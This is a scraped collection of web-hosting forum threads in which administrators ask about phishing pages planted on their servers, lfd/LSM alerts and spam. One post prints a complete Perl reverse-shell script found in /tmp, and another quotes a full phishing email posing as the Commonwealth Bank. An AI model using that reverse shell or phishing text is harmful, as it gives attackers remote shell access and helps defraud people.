Email Phishing Alert

Apr 26, 2008

Gmail has a feature to detect email phishing and it marks them with a red header alert saying "Warning" This message may not be from whom......", I believe this red alert has nothing to do with spf record of that email, so how does it detect it as phishing email?

We have spf record and I sent an email from another server, when I received that emai the spf record was "softfail" but it does not have that red alert.

View 0 Replies


ADVERTISEMENT

Software To Alert Me Using Sms Or Email When Server Is Down

Mar 28, 2009

Is there any software to alert me using sms and email when my server is down?

I know a few good online solutions but i want to test also a solution from my pc.

View 4 Replies View Related

Phishing

Nov 1, 2007

with my server i ran in to big issue with phishing sites. i have secured my server with firewall, and many other security things. but still i can see some times some one place phishing site. serverbeach suspend my server few times. i know this is not doing by users by there selfs. but however its coming in to the server. in secure side now i have to only go thorugh sites and check all writable directories.

is there any way to monitor the phishing activities? may be its some kind of scripts some one running inside the server?

View 8 Replies View Related

Phishing

Jun 15, 2007

I currently run a dedicated server and for the past 2 month or so have been attacked by some hackers or so. Meaning that on my sites every other day there is a folder of a phishing site. It is either paypal, ebay, exc phishing site and I know that I did not upload it there. I have tried almost anything to stop that, but it just keeps happening, my server company suggested to do os reload, but I am not sure as that will cost me $100. Was anyone faced with a problem like this that can give few suggestions? I use cpanel server.

View 8 Replies View Related

Prevent Phishing

Jun 1, 2008

I'm not that techy I'd like to ask why this person downloaded the file below before uploading some phishing webpages on my account ? I've changed my password numerious times from different computers and even from mobile phone just to check if the person can still get in. But again it is no use the person were able to upload phishing pages.

logs:

May 25 21:50:42 server100 pure-ftpd: (weblogin100@62.56.133.36) [NOTICE] /home/weblogin100//.htpasswds/update/Login.php downloaded (21251 bytes, 755.78KB/sec)

Right now I deleted all other scripts on the account and remain some htmls. Folder were also set to 644 no 777, while waiting if the person can still upload his phishing pages please help me why he downloaded the file above. I've check the file on my account and I cannot see Login.php. By the way I have a root login and only two accounts were a constant phishing victims.

View 1 Replies View Related

Scraper, Rogue Bot Or Phishing

Jun 9, 2009

I spotted a user on my site with the hostname: gator832.hostgator.com
This particular visitor identified themselves as a "visitor", with the user agent: Mozilla/4.8 [en] (Windows NT 6.0; U)

Upon typing the user's IP into google, a boatload of "phishing" / "bad bots" logs come up.

My question: Can I identify visitors like this via automation?
i.e.: fake users. People who masquerade themselves as a human, while they're really a bot.
(I only noticed this potentially 'bad' user because I was viewing my visitor log in real-time. -I was on at the very moment they were-)

In previous experience, not every user with the "host" phrase in their hostname are bad users, so sniffing those bits wouldn't do anything useful.

View 0 Replies View Related

Tracking Down Phishing Site

Jan 10, 2007

We have received the complain from paypal that one of the domains were phishing. How to track it down? How to find out the method that how they uploaded? I checked /tmp file and couldn't find anything. I check access_log file for wget and couldnt find anyting.

View 2 Replies View Related

Preventing Phishing Sites

Feb 18, 2007

I am running a hosting service. Recently a user put a phishing site on the server, pretending to be an eBay signup page and soliciting passwords. I had all kind of truble with this, because eBay complained to my server company.

I would like to ask if you know any solution what would block such sites automatically?

It could search for some predefined texts on the page (such as "sign in to eBay") and block the page if they are found. I wasn't able to find anything in Apache documentation.

View 6 Replies View Related

RapidVPS - Hosting For Scam And Phishing

Sep 18, 2008

I want post here about RapidVPS hosting,
they host all scam and phishy sites like Hyip.
What is Hyip? Here-> [url]

My proof:

ablehyip. com/hyip/ (IP:208.84.144.131)
globalmarketsol. org (IP:66.35.79.68)
forexco. us/index.php?a=home (IP:66.35.79.37)
xlinvestment. us (IP:66.35.79.29)
topprofitworld. net (IP:66.35.79.94)
real-onlineforex. com (IP:66.35.79.118)
fx-88. com (IP:208.84.150.149)
marvelpartners. us (IP:66.35.79.68)
and so on too many hyip scams, very big list.

All provided IP addresses are rigistered with
OrgName: Infinitum Technologies Inc. (RapidVPS)
OrgID: INFIN-27
Address: 873 Grand Regency Pte.
Address: Suite 201
City: Altamonte Springs
StateProv: FL
PostalCode: 32714
Country: US

All IP addresses are provided for
network: Organization-Org-Name:NVHSERVER Inc
network: Organization-Name:Ha Nguyen
network: Description-Usage:Internet Service Provider

I have contacted with RapidVPS admin and this guy (name is Rick) never answer my reports,
just ignore me, ban me, I'm sure he is owner of all this scam.

I have created account on the RapidVPS forum,
and Rick ban me for my first post about hyip scam on their servers,
here is proof: [url]

If you wanna ask about this issue, contact Rick directly: rickb@rapidvps.c0m

Guys what you think about this issue or maybe it's normal for all US hosters?

Please your comments.

Thanks for this post reading and your time.

Here is more info about hyip scam:
fbi.gov/majcases/fraud/fraudschemes.htm#ponzi
sec.gov/answers/ponzi.htm

View 14 Replies View Related

A List & Anti-phishing Stuff

Dec 17, 2007

I don't know about security on servers much, and we're setting up our new server. I have the techs doing the install stuff, but I would love to know what to install security wise. My current list:

Firewall - good free one?
Antivirus - good free one?

rootkit, some way of stopping it (anti-rootkit?)

Also, is there some sort of script which searches all cPanel accounts/files for phishing sites or spam sites etc? I swear I've seen one before, in firewall form?

Oh the server setup is going to be:

php5-CGI, fCGI, mySQL 5, apache 2.2.x, centOS, ruby on rails, django, ioncube, other php libraries, mod_rewrite, I think thats everything. (cPanel).

View 4 Replies View Related

Someones Uploaded A Phishing Site

Jul 31, 2007

Someones managed to upload a phishing site to my VPS.

How do they normally achieve this, there has been no unauthorised root access as I get e-mail each time someone log in as root.

Is it likely they've just managed to guess my ftp password, or is it going to have something to do with a script running elsewhere?

I've got solarvps looking at it now.

View 14 Replies View Related

HostGator Being Targeted By Australian Phishing Scam

Jun 2, 2009

I know Brent from HostGator reads here so thought I share this, If you are an Australian you are more than likely getting phishing emails supposedly from Commonwealth Bank (Australia's largest bank). I get about 20 a day to all my email addresses, here's one I got today:

We recorded a payment request from "HostGator -www.hostgator.com- Reseller Web Hosting"
to enable the charge of $74.95 on your account.

Because the order was made from an African internet address, we put an Exception Payment on
transaction id #POS PAYM7284 motivated by our Geographical Tracking System.

THE PAYMENT IS PENDING FOR THE MOMENT.

If you made this transaction or if you just authorize this payment, please ignore or remove this email
message. The transaction will be shown on your monthly statement as "HostGator - Reseller Web Hosting".

If you didn't make this payment and would like to decline the $74.95 billing to your card, please follow
the link below to cancel the payment :

Cancel this payment (transaction id #POS PAYM7284)

NOTE: Because email is not a secure form of communication, please do not reply to this email.

© Commonwealth Bank of Australia 2009 ABN 48 123 123 124

Of course I'm not a customer of this bank nor am I with HostGator, but these emails are getting more sophisticated by the day.. please also see [url]

View 6 Replies View Related

Spam/phishing Emails By Remote Connection (hacked)

Apr 23, 2009

One day, you noticed that someone remotely connectted your computer and an application sends spam/phishing emails bu using your IP. What do you do?

Of course, I stopped the program and blocked remote connection for a while and changed my password... I any way, i have to connect my computer remotely... What do you advice?

By the way, i have more than 1000 email accounts on my computer. Hacker left me a gift, but I don't need them))

View 9 Replies View Related

How To Fight Phishing / Fraud Sites In Free Hosting Server?

Aug 30, 2007

I run a Free web hosting service on my server with XPanel script installed. It has around 47K accounts in all. Recently i started getting mails from e-bay, banks and many other institutions regarding the Phishing sites operating from my server for cheating their customers / members. Though i removed them but i have to do it manually and after getting mails from them.

Now that i dont want any more such site to run from my hosting site, What are the options available for me in order to check all accounts automatically and remove any such site on its own? As there are 47K accounts and 100+ new signups each day, it is not possible to check all accounts manually.

I want any script / addon which can check all possible Phishing / Spamming / Spurious / Fraud sites and intimate me/ delete them upon request. Any person using such services? I need your guidance + support.

Looking for some fast and effective answers from experts here.

View 10 Replies View Related

Plesk 11.x / Linux :: Scripts Of SPAM And Phishing Installed On Server?

May 22, 2014

I are running an Plesk 11.5 on a Ubuntu 12.04 machine. Since days i have problems where i see scripts of phishing sites and mailer scripts installed in the httpdocs directory of various domain.

How I can prevent that people outsiders install this scripts on the server? Where is the bug that allows this?

View 4 Replies View Related

SSH Alert

Feb 8, 2008

I dont know if this has been asked before. Anyway what I want to accomplish is I want an email be sent to my email address everytime someone connects to my SSH. I want an email sent regardless it was a successful or failed login. Is there a step by step tutorial for this.

View 5 Replies View Related

LSM Alert

Mar 3, 2008

I just received this alert, can anyone tell me what that means?

I did not install anything...

> tcp 0 0 IP:19848 0.0.0.0:* LISTEN -
> tcp 0 0 IP:19900 0.0.0.0:* LISTEN -
> tcp 0 0 IP:22812 0.0.0.0:* LISTEN -
> tcp 0 0 IP:24924 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27411 0.0.0.0:* LISTEN -
> tcp 0 0 IP:27542 0.0.0.0:* LISTEN -
> tcp 0 0 IP:29077 0.0.0.0:* LISTEN -
> tcp 0 0 IP:32895 0.0.0.0:* LISTEN -
> tcp 0 0 IP:36635 0.0.0.0:* LISTEN -
> tcp 0 0 IP:46277 0.0.0.0:* LISTEN -
> tcp 0 0 IP:47068 0.0.0.0:* LISTEN -
> tcp 0 0 IP:51199 0.0.0.0:* LISTEN -
> tcp 0 0 IP:52752 0.0.0.0:* LISTEN -
> tcp 0 0 IP:56869 0.0.0.0:* LISTEN -

View 0 Replies View Related

Alert Notification In Lfd

Apr 30, 2008

I installed csf: v3.28 on my server .

Where is this email configurable? I have seen this email alert notification in the logs numerous times but have yet to receive any alert emails from CSF/LFD.

View 1 Replies View Related

Relay Alert

Jun 5, 2008

i have this notification that keeps coming from the same ip at least 10 or 20 times a day since 3 days aprox. dunno what it is...

this is the message:

Quote:

subject: lfd on nameserver.domain: RELAY Alert for 200.27.xxx.xxx (domain.cl)

body:

Time: Thu Jun 5 10:56:19 2008
Type: RELAY, Remote IP - 200.27.xxx.xxx (domain.cl)
Count: 101 emails relayed
Blocked: No

Sample of the first 10 emails:

2008-06-05 10:19:56 1K4GJo-00040m-Rf <= 3eseofertas@gmail.com H=(mail.gmail.com) [200.27.xxx.xxx] P=esmtp S=1738 id=20080605102044.5323CE2BEB4A1707@gmail.com T="Especial Empresas STGO - CCTV -Evaluacion en Terreno sin Costo."

it looks like spam... is my server sending spam or im receiving it?

View 2 Replies View Related

Downtime Alert

Jul 13, 2007

I have many domains and webservers. so it's hard to monitor everything usually. i heard there are some websites and softwares to do this.

does windows 2003 have anything default like this ? or can anyone suggest the application for my windows 2003 server? which sends alerts if any error is going on my server?

Also there any other websites which is doing this monitoring? because i have some shared accounts and i want to monitor it too.

View 5 Replies View Related

VPS QoS Alert - Memory

May 30, 2007

please check the following screnshot

[url]

this is way better, my server goes up for 10-20 minutes then I have to hit restart from the virtouzzo, becuase the server simply goes dead. nothing loads..

how can I know which site on my vps is causing trouble and how to fix it?

View 3 Replies View Related

LSM Alert On Server

Feb 13, 2007

I am getting on every 10 minutes mails like that from my server every one has different ports

Quote:

This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 ************:3262 0.0.0.0:* LISTEN

Quote:

This is an automated alert generated from *************. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 *************:53007 0.0.0.0:* LISTEN -

Quote:

This is an automated alert generated from *********. This alert is to
notify the addressed users of new server sockets. New server sockets can
indicate server-software that has been started on your host, or otherwise
be an indication to malicious activity. It is advised to review this alert
and investigate if needed.

Following is a summary of new Internet Server Sockets:
> tcp 0 0 ***********:44543 0.0.0.0:* LISTEN

How can i find why this is coming? My managment company said me that a script is tryig to open a socket but we couldnt find the script. Is there any people here have like a similar issue or how can i find and solve this?

View 2 Replies View Related

SCAM Alert : Hajto.com.pl

Apr 16, 2009

has anyone purchased a server from the op and received it yet?

View 14 Replies View Related

Alert For Fella Hosts

Apr 10, 2008

In less than 5 mins of account activation user named Paul McGrath, supposedly from NY. Allegedly using lolchurch.com domain (that domain was never forwarded to our server) and user just put a script called send.php and let it rip.

Good thing i was around and management looked at it within minutes (AcuNett).

So, watch for this user signing up and check account(if using that user name or similar domain or recent signups) for any such php page.

Now asks us for refund for suspending his site for spamming.. Asked for his driver license copy to first verify his address, so possibly i can report to paypal for possible fraud too or some online internet police maybe for fraud if there is such a police

Note to Mods. not sure where threads like these go to!

Quick edit: Now user trying to threaten us to give their refund cause they want it back for they spammed and deserve a refund for the same.

"Your servers were awful anyways, I maybe sent 500 emails? I'm gonna ask nicely before I actually do something about this, give me a refund."

he forgot 500 emails in less than 5 mins. does not look like not-spam. Anyways i go have some chat with the fraud, id does not match paypal payment id

View 14 Replies View Related

Error :: Alert: No_kernel_support_for_openvz_check_if_right_kernel...

Mar 25, 2009

why its doing this when i try create a vps?

Quote:

Alert: no_kernel_support_for_openvz_check_if_right_kernel...

Quote:

[root@box ~]# cat /etc/grub.conf
# grub.conf generated by anaconda
#
# Note that you do not have to rerun grub after making changes to this file
# NOTICE: You have a /boot partition. This means that
# all kernel and initrd paths are relative to /boot/, eg.
# root (hd0,0)
# kernel /vmlinuz-version ro root=/dev/sda5
# initrd /initrd-version.img
#boot=/dev/sda
default=0
timeout=5
splashimage=(hd0,0)/grub/splash.xpm.gz
hiddenmenu
title CentOS (2.6.18-92.1.22.el5)
root (hd0,0)
kernel /vmlinuz-2.6.18-92.1.22.el5 ro root=LABEL=/
initrd /initrd-2.6.18-92.1.22.el5.img
[root@box ~]#

Quote:

[root@box ~]# rpm -qa | grep kernel
kernel-2.6.18-92.el5
kernel-devel-2.6.18-92.el5
kernel-2.6.24.5grsechostnoc4.0.0x86_64libata-1
kernel-headers-2.6.18-92.1.22.el5
kernel-devel-2.6.18-92.1.22.el5
kernel-2.6.18-92.1.22.el5
[root@box ~]#

Have tried running:

yum -y install ovzkernel.x86_64

Quote:

Installing: ovzkernel ######################### [1/1]
Error unpacking rpm package ovzkernel - 2.6.18-92.1.18.el5.028stab060.2.x86_64
error: unpacking of archive failed on file /lib/modules/2.6.18-92.1.18.el5.028stab060.2/kernel/arch/x86_64/crypto/aes-x86_64.ko;49c8f08e: cpio: write

Installed: ovzkernel.x86_64 0:2.6.18-92.1.18.el5.028stab060.2
Complete!

View 3 Replies View Related

Fraud Account Alert

Jul 3, 2008

I've gotten two fraudulent signups from the following ip address:
206.53.49.**

Luckily, maxmind has caught him both times, but he's using an address from canada and the phone is fake but the domains he's using are real.

I've gone ahead and blocked the ips, but I just wanted to let you guys know.

View 14 Replies View Related

Lfd: Suspicious File Alert

Mar 24, 2008

I got this system email:

Time: Sun Mar 23 23:09:01 2008
File: /tmp/back
Reason: Script, starts with #!
Owner: nobody:nobody
Action: No action taken

So I looked and the file says this:

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!
");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!
");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!
");
connect(SOCKET, $paddr) || die("Error: $!
");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

That one line 'echo "`uname -a`";echo "`id`";/bin/sh';

View 13 Replies View Related

Shell Script Alert

Jun 7, 2007

how i can secure vps from this kind of script and known when someone upload shell script. How do I set the alert so I get to know that someone has uploaded a script on the server

View 3 Replies View Related

Alert: Open DNS Server

Apr 16, 2007

I've run "DNS report" test for one hosting in dnsstuff.com and got this warning (as some times before for other hosts:

---------------------
Fail:
Open DNS server

ERROR: One or more of your nameservers reports that it is an open DNS server. This usually means that anyone in the world can query it for domains it is not authoritative for (it is possible that the DNS server advertises that it does recursive lookups when it does not, but that shouldn't happen). This can cause an excessive load on your DNS server. Also, it is strongly discouraged to have a DNS server be both authoritative for your domain and be recursive (even if it is not open), due to the potential for cache poisoning (with no recursion, there is no cache, and it is impossible to poison it). Also, the bad guys could use your DNS server as part of an attack, by forging their IP address.
-----------------------

Is this anythhing important?

View 3 Replies View Related

Strange Error : Alert: File_exists_not_owned

Jun 9, 2009

strange error : Alert: file_exists_not_owned

file_exists_not_owned [/home/admin/lc//index.html]

this error gets displayed, when trying to edit any file (suitable filename ) via Kloxo

I checked the chmod permission it was 755, still I was unable to edit file via Kloxo

any suggestions on why this problem and how to overcome this?

View 3 Replies View Related

E-mail Alert On Root SSH Login

Jun 3, 2009

Want to be notified instantly when someone logs into my server as root With date time & local IP address

View 12 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved